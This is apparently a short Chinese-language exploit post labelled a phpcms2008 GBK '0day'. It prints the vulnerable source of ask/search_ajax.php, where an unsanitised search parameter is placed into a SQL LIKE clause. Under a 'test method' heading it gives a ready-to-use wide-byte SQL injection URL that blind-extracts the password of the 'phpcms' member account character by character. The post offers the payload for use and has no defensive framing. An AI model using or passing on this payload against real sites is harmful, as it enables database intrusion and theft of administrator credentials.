phpcms2008 0day ask/search_ajax.php 受影响程序: phpcms2008 gbk 漏洞文件:ask/search_ajax.php 1<?php2require './include/common.inc.php';3require_once MOD_ROOT.'include/ask.class.php';4$ask = new ask();5header('Content-type: text/html; charset=utf-8');6if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);7if($q)8{9$where = " title LIKE '%$q%' AND status = 5";10}11else12{13exit('null');14}15$infos = $ask->listinfo($where, 'askid DESC', '', 10);10 collapsed lines16 17foreach($infos as $key=>$val)18{19$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);20$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];21$info[$key]['url'] = $val['url'];22}23 24echo(json_encode($info));25?> 测试方法: 1ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 via nuke